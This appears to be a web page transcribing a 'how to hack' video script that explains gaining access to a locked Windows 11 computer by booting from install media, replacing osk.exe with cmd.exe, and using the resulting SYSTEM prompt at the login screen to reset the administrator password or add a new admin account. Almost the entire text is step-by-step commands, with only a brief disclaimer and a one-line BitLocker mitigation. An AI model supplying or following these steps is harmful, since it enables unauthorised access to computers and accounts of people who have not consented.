Home » Tools » How to Hack Windows 11 Using osk.exe (On-Screen Keyboard Exploit)

🎥 Title: How to Hack Windows 11 Using osk.exe (On-Screen Keyboard Exploit)

⚠️ Disclaimer: This video is for educational and ethical hacking purposes only. Do not use this method on any computer you do not have permission to access.

Intro:

Hey everyone!
In this video, I’ll show you how to hack into a Windows 11 machine using the On-Screen Keyboard exploit — a method similar to the Sticky Keys trick, but using osk.exe instead of sethc.exe.

This method works only if the computer is not protected by BitLocker or Secure Boot.

Let’s get started!

Step 1: Boot from Windows 11 ISO

First, shut down the locked computer.

Insert a bootable Windows 11 USB or ISO file and boot from it.

On the first screen, press Shift + F10 to open Command Prompt.

Step 2: Find the System Drive

Type the following to find the Windows drive:

diskpart

list volume

exit

Look for the volume that contains Windows — usually it’s D: or C:.

Switch to it:

d:

dir

Make sure you see folders like Windows, Users, and Program Files.

Step 3: Backup osk.exe

Now we’ll back up the original osk.exe:

copy d:\windows\system32\osk.exe d:\

This saves the original On-Screen Keyboard file to the root of D: drive.

Step 4: Replace osk.exe with cmd.exe

Now copy Command Prompt over the On-Screen Keyboard:

copy d:\windows\system32\cmd.exe d:\windows\system32\osk.exe

Confirm if asked to overwrite.

Step 5: Reboot

Now reboot the computer:

wpeutil reboot

Let it boot into the normal Windows 11 login screen.

Step 6: Launch Command Prompt from Login Screen

At the login screen:

  • Click the Ease of Access icon at the bottom right
  • Then click On-Screen Keyboard

Instead of the keyboard, a Command Prompt window will appear — running with SYSTEM privileges.

Step 7: Reset the Password or Create a New User

Now in the Command Prompt, you can reset the admin password:

net user administrator *

Or create a new admin account:

net user hacker 123456 /add

net localgroup administrators hacker /add

You can now log in using that new account.

Step 8: Clean Up (Optional)

After logging in, restore the original On-Screen Keyboard:

Open a Command Prompt and type:

copy d:\osk.exe d:\windows\system32\osk.exe

That’s it — you’ve cleaned up the exploit.

Outro:

This method is for educational and ethical hacking purposes only.

The best way to prevent this kind of attack is to enable BitLocker encryption. That way, even if someone boots from USB, they won’t be able to access or modify system files.

If you found this video helpful, drop a like, leave a comment, and don’t forget to subscribe for more ethical hacking tutorials.

Stay safe and see you in the next one!

 

Scroll to Top